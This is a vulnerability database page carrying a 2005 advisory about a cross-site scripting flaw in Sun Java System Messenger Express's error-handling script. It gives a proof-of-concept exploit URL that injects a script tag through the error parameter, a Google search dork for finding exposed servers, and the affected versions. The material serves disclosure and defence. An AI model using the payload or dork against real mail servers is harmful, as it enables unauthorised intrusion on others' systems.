Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14880
HistoryNov 01, 2006 - 12:00 a.m.

Sun java System Messenger Express XSS

2006-11-0100:00:00
vulners.com
13
JSON

Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2005
MorX security research team
www.morx.org
Description:
Sun java System Messenger Express XSS

The index script is vulnerable to XSS attacks, in function errorHTML .

function errorHTML() {
var s='';
.
.
.
document.write(s) —> Need more case filetring the 's' var
}

So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
Exploit:
https://mail.victime.edu/?user=&amp;amp;error=&#37;3Cscript&#37;3Ealert&#40;&#39;hakin9&#39;&#41;;&#37;3C/script&#37;3E&lt;/a&gt;

Googledork :
intitle: "Sun Java(tm) System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6

JSON